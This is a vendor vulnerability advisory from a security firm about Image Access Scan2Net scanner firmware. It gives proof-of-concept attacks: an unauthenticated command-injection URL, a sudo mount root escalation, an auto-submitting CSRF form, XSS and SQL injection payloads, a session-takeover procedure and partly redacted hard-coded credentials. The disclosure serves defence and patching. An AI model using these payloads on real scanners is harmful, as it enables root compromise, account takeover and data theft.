Multiple Critical Vulnerabilities in Image Access Scan2Net

Title

Multiple Critical Vulnerabilities

Product

Image Access Scan2Net

Vulnerable Version

Firmware <=7.40, <=7.42, <7.42B (depending on the vulnerability)

Fixed Version

mostly fixed in v7.42B

CVE Number

CVE-2024-28138, CVE-2024-28139, CVE-2024-28140, CVE-2024-28141, CVE-2024-28142, CVE-2024-28143, CVE-2024-28144, CVE-2024-28145, CVE-2024-28146, CVE-2024-47946, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494, CVE-2024-50584

Impact

critical

Homepage

https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en

Found

22.06.2023

By

Daniel Hirschberger, Tobias Niemann (Office Bochum)

Multiple vulnerabilities allowed an unauthenticated attacker to execute arbitrary commands as root user on all devices over the network, which are running the Scan2Net software from Image Access. This mainly includes large paper format scanner like the WideTEK series. Additionally, an attacker could perform SQL injection to manipulate the database, perform a cross site request forgery attack to reset the administrator's password or create a new user, perform cross site scripting attacks to execute arbitrary JavaScript in the browser of victims and decrypt exported configurations and directly connect to the database because of hard-coded credentials across devices.

Vendor description

"Scan2Net® - The Ultimate Scanning Technology

  • Better than just another client software package
  • Integrates into existing networks without additional drivers or PCs
  • Unrivaled performance, highest security, low connectivity cost

The Scan2Net® platform is the technological foundation of all WideTEK® and Bookeye® scanners from Image Access. It replaces the proprietary scanner drivers and software that traditional scanners require with the fastest common, nonproprietary connection available: TCP/IP over Ethernet. With network interface speeds much higher than USB or SCSI, Scan2Net devices are able to reach unrivaled performance at very low connectivity cost. The Linux based operating system is dedicated to scanner specific imaging and mechanical control tasks, further maximizing scanning speeds and performance."

Source: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en

Business recommendation

The vendor provides a firmware update to version 7.42B which should be installed immediately. SEC Consult could only partially verify the correction of all identified vulnerabilities. Some vulnerabilities have not been fixed by the vendor as the risk was accepted.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.

Vulnerability overview/description

An unauthenticated attacker with network access to the scanner can execute any system command via the "msg_events.php" script as the www-data user.

The www-data user can elevate his privileges because sudo is configured to allow the execution of the mount command as root without a password. Therefore, the privileges can be escalated to the root user.

The scanner boots into a kiosk mode by default and opens the Scan2Net interface in a browser window. This browser is run with the permissions of the root user. There are also several other applications running as root user, some of them are self-developed ones but those could not be exploited at first glance.

The web application is not protected against cross-site request forgery attacks. Therefore, an attacker can trick users into performing actions on the application when they visit an attacker-controlled website or click on a malicious link.

Due to missing input sanitization, an attacker can perform cross-site-scripting attacks and run arbitrary Javascript in the browser of other users.

The password change function does not require the current password, which makes the application vulnerable to account takeover, especially if combined with the CSRF vulnerability.

Due to missing access control on the reboot and shutdown functions, an attacker can perform a denial-of-service attack against the application. Furthermore, an attacker who can spoof the IP address and the User-Agent of a logged-in user can takeover the session because of flaws in the self-developed session management.

An unauthenticated attacker can perform an SQL injection by accessing the dbconnector.php file and supplying malicious GET parameters.

The application uses several hard-coded credentials for protecting the firmware update file and the installed database server.

By April 2024, ImageAccess GmbH provided us with an internet-facing test device and we spent some short time verifying the vulnerabilities in their latest firmware (7.40) which should fix the security issues according to the vendor. Unfortunately, most of them are still present and new ones have been discovered.

Update 2024-04-02 in short:

Fixed, but a new RCE vulnerability has been discovered which requires a session as Poweruser, updated PoC below. The second RCE issue is tracked as CVE-2024-47946.

Still an issue.

Still an issue.

Fixed. The introduced "session_id" cookie is protected with the "SameSite=Strict" cookie flag. This prevents CSRF attacks.

Original issues are fixed (CVE-2024-28142, CVE-2024-47947), but we discovered a new one, updated PoC below. The new XSS is tracked as CVE-2024-36498.

Fixed. The password change function now requires the current password.

Still an issue.

If two users access the web interface from the same IP they are logged in as the other user. Updated PoC below.

Original issue fixed, but a new blind SQLi as Poweruser has been found, updated PoC below. The new SQLi is tracked as CVE-2024-50584.

Still an issue, credentials can be found in different files.

By October 2024 ImageAccess GmbH provided us with an internet-facing test device and we spent some short time verifying the vulnerabilities in their latest firmware (7.42) which should fix the submitted critical security issues according to the vendor.

Update 2024-10-14 in short:

The new RCE vulnerability is fixed now.

Still an open issue. The risk has been accepted by the vendor because the other critical issues are fixed and shell access is not easily possible anymore.

The kiosk browser is no longer running as root but many other custom services still are.

Fixed.

The third XSS (CVE-2024-36498) has also been fixed. We discovered a new XSS vulnerability in the login page which only works if the target user is _not_ already logged in, which makes it ideal for login form phishing attempts. The new XSS is tracked as CVE-2024-36494.

Fixed. The password change function now requires the current password.

Still an issue.

The blind SQLi as Poweruser has been fixed.

Mostly fixed. Many credentials can be found in different files. The most problematic 'support' user had their password rotated and it was not immediately obvious where it is stored now.

Figure 1: Output of the "id" command

Proof of concept

1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)

An unauthenticated attacker with network access can execute arbitrary commands by visiting the following URL. The HTTP GET parameter "data" is not properly sanitized:

https:// $SCANNER/class/msg_events.php?action=writemsgfifo&data=;$COMMAND

For example, the following URL can be used to display information about the current user of the web server:

https:// $SCANNER/class/msg_events.php?action=writemsgfifo&data=;id

The following image (figure 1) shows the output of the command:

Figure 2: Command Injection

Update 2024-04-02: The second issue is now tracked as CVE-2024-47946.

The OS command injection as shown above is no longer possible in the new firmware version 7.40. Another possibility to gain remote code execution has been identified if the attacker has access to a valid Poweruser session. Specifically crafted valid PNG files with injected PHP content can be uploaded as desktop backgrounds or lock screens. After the upload, the PHP script is available in the web root. The PHP script executes once the uploaded file is accessed. This allows the execution of arbitrary PHP code and OS commands on the device as "www-data".
 

Figure 3: Sudo -L command
Figure 4: Sudo mount

2) Privilege Escalation (CVE-2024-28139)

By executing the command "sudo -l" as the www-data user, it is apparent that this user can be used to escalate privileges to root, as shown in figure 3.

The following commands can be executed to elevate to root privileges, as shown in the figure 4.

> sudo mount -o bind /usr/bin/bash /usr/bin/mount
> sudo mount
Figure 5: Register user result

3) Violation of Least Privilege Principle (CVE-2024-28140)

Many processes are running with root privileges which violates the principle of Least Privilege.

This can be confirmed by running "ps aux" as the root user and observing the output:

root  /opt/s2n/bin/S2NBrowserV7 --no-sandbox StartUpSelection.html x:0 y:800 w:1920 h:1080
root   \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US
root       \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US
[...]

Apart from the browser the following binaries are also run with root permissions:

vsftpd, smbd, wsdd.py, X11, OpenBox
s2n-specific Binaries (copyd, s2ncopy, ocrd, imaged, camd_ucc1, admind, s2nwdd,ledd, wt36keyb, ...)

4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)

The application offers no protection against Cross-Site Request-Forgery. An attacker can therefore forge malicious links to reset the admin password or create new users.

4.1) Reset Admin Password

The following link resets the password of the administrator to the value "CSRF2YOU!". The password is base64-encoded (Q1NSRjJZT1Uh).

https:// $SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm

 

4.2) Register a new user

The following code can be hosted on a malicious page controlled by the attacker. When a user who is logged in as administrator is lured by the attacker to visit this page, a new user "SECtest" with the password "CSRF2YOU!" is automatically created:

<html>
 <body>
   <form action="https://$SCANNER/cgi/upuserdata.cgi" method="POST">
     <input type="hidden" name="groupid" value="0" />
     <input type="hidden" name="username" value="SECtest" />
     <input type="hidden" name="pw1" value="CSRF2YOU!" />
     <input type="hidden" name="pw2" value="CSRF2YOU!" />
     <input type="submit" value="Submit request" />
   </form>
   <script>document.forms[0].submit();</script>
 </body>
</html>

The following image shows the result:

Figure 6: XSS scenario 1
Figure 7: XSS Scenario 1 triggered

5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494)

There are at least two identified injection points:

5.1) Scenario 1: Stored XSS via User Settings -> File Name (CVE-2024-28142)

a. Login as Scan2Net User.
b. Navigate to User Settings -> File Name (https://$SCANNER/cgi/uset.cgi?-cfilename)
c. Edit the "Wildcard Character" %2 setting to contain the following payload and reference it in the file name:

> <script>alert(document.location)</script>

d. The JavaScript payload will be saved automatically.
e. The payload will be triggered on each visit of the User Settings -> File Name page.

It is also executed when an admin visits the following page:

https:// $SCANNER/cgi/uset.cgi?-cfilename

This attack can even be performed without being logged in because the affected functions are not fully protected. Without logging in, only the file name parameter of the "Default" User can be changed. However, the wildcards can be changed without authentication. To inject the payload, the following two requests have to be submitted.

I. Changing the file name of the "Default" user to scan_xss%2.pdf:

https:// $SCANNER/cgi/chopt.cgi?uset+save_filename+scan_xss%252.pdf+filename+Default

II. Changing the Wildcard %2 to the JavaScript payload:

https:// $SCANNER/cgi/chopt.cgi?fileabb+fileabb_customvalue2+%3Cscript%3Ealert(document.location)%3C/script%3E
Figure 8: XSS scenario 2 insertion
Figure 9: XSS scenario 2 (trigger browser)
Figure 10: XSS scenario 2 (trigger touch)

5.2) Scenario 2: Stored XSS via the ScanWizard Disclaimer (CVE-2024-47947)


The "Edit Disclaimer Text" function of the configuration menu is also vulnerable. Only the users Poweruser and Admin can use this function which is available at the URL

https:// $SCANNER/cgi/admin.cgi?-rdisclaimer+-apre

The JavaScript can be inserted as shown in figure 8.

Afterwards, this change has to be applied by clicking on the "Apply" button. From now on the payload will be executed every time the ScanWizard is loaded. The URL of the ScanWizard interface is: $SCANNER/ScanWizard.html (see figure 9).

This also includes the ScanWizard which is displayed in the Kiosk-mode browser which is present on the physical touch-enabled display of the scanner itself (see figure 10).

Update 2024-04-02:

The third issue is now tracked as CVE-2024-36498. The following text can be inserted as Poweruser into the disclaimer to exploit this issue:

%3c%53%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%53%63%72%69%70%74%3e

This is the payload <Script>alert(1)</Script> URL-encoded.


Update 2024-10-14:

The fourth issue is now tracked as CVE-2024-36494. A new reflected XSS, which only works on unauthenticated targets, has been found:

https:// $SCANNER/cgi/slogin.cgi?-tsetup+-uuser%22%20onfocus%3ddocument.body.innerHTML%2B%3dlocation.hash,document.body.innerHTML%2b%3ddocument.body.innerText%20autofocus%20b%3d#<img/src="x"onerror="alert(1)"&gt

Update 2024-11-12:

The vendor tells us that the latest identified XSS issue should be fixed with version 7.42B.

6) Insecure Password Change Function (CVE-2024-28143)

The password change function does not require the user to enter the old password in order to set a new one. As explained in the CSRF finding (4.1), an attacker can use this to forcefully set a new password for a user without knowing the old password. The following link sets the password of the user, who clicks on it, to the value "CSRF2YOU!" which is "1Q1NSRjJZT1Uh" when encoded with base64.

https:// $SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm

7) Broken Access Control (CVE-2024-28144)

7.1) Reboot and Shutdown functions

The functions "reboot" and "shutdown" can be called without any authorization checks nor any authentication:

https:// $SCANNER/cgi/shutdown.cgi
https:// $SCANNER/cgi/reboot.cgi

The authorization checks are also missing on the User Settings -> File Name and  the dbconnector as described in chapter 5.1 and 8 respectively.

Figure 11: Disclaimer
Figure 12: Authentication error

7.2) Broken Session Management

Scan2Net implements a custom algorithm for the session management. The algorithm is implemented the following way:

> SID1="$(/opt/s2n/bin/hide -s -e -i "$REMOTE_ADDR:$HTTP_USER_AGENT" -p $HOSTNAME)"

The result is stored in the database as the current session ID. On each access request to Scan2Net the SID1 is calculated and compared to the stored session ID in the database.  This also means that only one user can be logged in at any time.  Furthermore, an attacker who is able to spoof the IP address of a victim and knows the User Agent which was used to login, can take over the session of the victim.

Update 2024-04-02: The session management is still broken.

Start two browsers of your choice (this example will use Chrome and Firefox). Browse to $SCANNER_IP/cgi/config.cgi in both browsers. Notice that you are not logged in in both ones and your "login level" is "Default". Login in Chrome as Poweruser. Refresh the page in Firefox and notice that your login level now displays "Poweruser".

Browse to https:// $SCANNER/cgi/slogin.cgi?-tsetup+-uPoweruser in Firefox and click on "Edit Disclaimer Text". You will get the following error message as seen in figure 11 and 12.

In Firefox browse to $SCANNER_IP/ScanWizard.html, then $SCANNER_IP/cgi/setupmenu.cgi and click on "Edit Disclaimer Text" once more. This time you can edit the disclaimer.

8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584)

An unauthenticated attacker can reach the database connector at the following URL:

https:// $SCANNER/class/dbconnect.php

The connector accepts several query parameters: 

> action, search, table, field, value

Of those, the parameters search, table, field, and value are vulnerable against SQL injection. For example, one SQL injection can be performed on the parameter "field" with the UNION keyword. The following request returns the version of the used SQL database server by union selecting "@@version":
 

http:// $SCANNER/class/dbconnect.php?action=getdbvalue&search=singlemode&table=user_touchscreen&field=configuration_name%20UNION%20ALL%20SELECT%20@@version--%20-&value=ScanWizard

The web server responds with:

> HTTP/1.1 200 OK
> […]
> 10.3.38-MariaDB-0+deb10u1

The database is accessed with the rights of the user "s2n".


Update 2024-04-02

The second issue is now tracked as CVE-2024-50584. The injection point shown above has been fixed in the new firmware (7.40), but a new exploitable injection point was discovered in template_io.php. An attacker with an active session as Poweruser can access the following URL:

https:// $SCANNER/class/template_io.php

The PHP script processes the following query parameters:

> action, table, templates

The templates parameter is vulnerable against blind boolean-based SQL injection attacks. SQL syntax must be injected into the JSON syntax of the templates parameter. As a short proof of concept the following three requests can be sent:

https:// $SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default"}
https:// $SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default'+AND+1337=1336--+A"}
https:// $SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default'+AND+1337=1337--+A"}

For the 1st (no injection) and 3rd (true condition) request the server responds with the identical ZIP file in the response:

> HTTP/1.1 200 OK
> […]
> Content-Length: 1699
> PK[…]

Only the response from the 2nd request (false condition) differs in length and content.  This indicates that the injected SQL is processed by the database:

> HTTP/1.1 200 OK
> […]
> Content-Length: 1268
> PK[…]

The vulnerability was successfully exploited to exfiltrate data from the connected database. As before, the database is accessed with the db user "s2n".

9) Hard-coded Credentials (CVE-2024-28146)

After obtaining root access to the scanner, the system could be examined and checked for hard-coded credentials. The found credentials are used to encrypt config files during backup, decrypt the new firmware during an update and some of the listed passwords allow a direct connection to the database server of the scanner. 

| File                                | Usage                         | Username | Password      |
| ----------------------------------- | ----------------------------- | -------- | ------------- |
| /opt/s2n/www/cgi/infoio.cgi         | Encryption of exported config | -        | !Ba[REDACTED] |
| /opt/s2n/www/cgi/sysupd-1           | Encryption of firmware update | -        | Gle[REDACTED] |
| /opt/s2n/www/cgi/sysupd-2           | Encryption of firmware update | -        | Gli[REDACTED] |
| /opt/s2n/www/cgi/sysupd-3           | Encryption of firmware update | -        | Bet[REDACTED] |
| /opt/s2n/www/cgi/sysupd-7           | Encryption of firmware update | -        | 201[REDACTED] |
| /opt/s2n/www/class/LocaleImport.php | login for database            | support  | HDD[REDACTED] |
| /opt/s2n/www/class/DBmysqli.php     | login for database            | s2n      | fsc[REDACTED] |
| /opt/s2n/www/class/dbconnect.php    | login for database            | mysql    | MK2[REDACTED] |

Vulnerable / tested versions

The following version has been tested which was the latest version available at the time of the test in 2023:

  • Firmware 7.31L on a WideTEK 36CL-600 Scanner

All previous versions of Scan2Net before 7.40 are affected, which are used in WideTEK or Bookeye scanners.

SEC Consult was provided access to a patched scanner device by the vendor with firmware 7.40 in March 2024. It was briefly verified whether the security issues were properly fixed, but it was identified that most security issues are still present in the latest version.

Furthermore, the most recent firmware version 7.42 was rechecked in October 2024. Most critical security issues have been fixed, but some issues are still open.

Vendor contact timeline

2023-06-22 Penetration test at our customer is done, we offer to start the responsible disclosure process with the vendor. Customer wants to do the responsible disclosure process themselves.
2023-07-10 We ask if there is an update from the vendor; Customer informs us that there is no update yet.
2023-07-10 Customer informs us that the vendor is cooperative and working on a timeline for the remediation of the vulnerabilities.
2023-09-18 Because of an unrelated project we ask the customer if we should start a responsible disclosure process for that other project; Customer wants us to do the responsible disclosure process because they are currently lacking the resources to do it themselves. This also includes yet another, unrelated, older project; We ask if we should also start a responsible disclosure process for <this> project.
2023-09-22 Customer gives us permission for this project as well.
2023-11-28 Contacting vendor via support@imageaccess.de; no response.
2023-12-18 Contacting vendor again via support@imageaccess.de
2023-12-21 Support requests device name, serial number and firmware version.
2023-12-22 We provide the device name and firmware version, don't have serial number; no response from vendor.
2024-01-17 Asking vendor again where to send the advisory, if encryption is supported; no response.
2024-02-07 Submitting this case to German CERT-Bund/BSI via CVD including advisory details.
2024-02-09 Response from CERT-Bund, trying to establish contact with vendor.
2024-02-19 Response from CERT-Bund, vendor provides version 7.40 which fixes the issues.
2024-02-19 Asking whether the advisory was sent to the vendor by CERT-Bund, trying to clarify how to verify the fix and which devices and firmware versions are affected. Preparing CVE reservation.
2024-03-04 Vendor responds to CERT-Bund and keeps SEC Consult in CC. Users can download the firmware themselves via the download page.
2024-03-05 Asking about affected devices (Scan2net WideTEK, Bookeye, etc). Reserving CVE numbers and sending them to vendor.
2024-03-12 Detailed vendor response, providing internet-facing test device to verify the latest firmware version 7.40.
2024-03-25 Briefly verifying latest firmware version, most security issues still present. Updating security advisory.
2024-04-02 Sending updated advisory to vendor, asking for a meeting. No response.
2024-04-12 Asking whether email was received and to schedule a meeting.
2024-04-16 Productive conference call, further explained open security issues, updated firmware version scheduled for mid May.
2024-05-23 Asking for a status update. No response.
2024-06-11 Asking for a status update again. Vendor informs that new version should be available by end of the week.
2024-06-18 Vendor informs us that new version is available and should fix all reported issues.
2024-09-26 Requesting access to test system again to verify fix (delay because of longer vacation period)
2024-09-26 Quick vendor response, providing access to test system again.
2024-09-27 Apologizing for delay because of vacations/absences, recheck will be performed soon.
2024-09-27 Vendor provides updated version information, latest version is currently v7.42.
2024-10-14 Recheck of latest firmware version.
2024-10-15 Informing vendor about the open issues, providing current draft advisory. Asking about next steps/accepted risks.
2024-10-28 Asking for a status update.
2024-11-11 Asking for a status update.
2024-11-12 Vendor tells us that 7.42B should fix the newest XSS. We state that we no longer have capacities for further rechecks.
2024-11-29 Sending latest advisory draft to vendor, proposing release date for 2024-12-04. Vendor accepts the publication date and mentions that they want to release a bugfix for issue #7 this week.
2024-12-04 Public disclosure of security advisory.

Solution

The vendor provides a firmware update to version 7.42B which can be downloaded via the vendor's customer server portal:

https://www.imageaccess.de/?page=SupportPortal&lang=en

This version fixes most of the identified issues. Only a few issues remain, where the vendor has accepted the risk or is going to patch it in the future.

Workaround

None
 

Advisory URL

https://r.sec-consult.com/imageaccess

 

EOF Daniel Hirschberger, Tobias Niemann, Johannes Greil / @2024
 

Interested to work with the experts of SEC Consult? Send us your application
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices

Back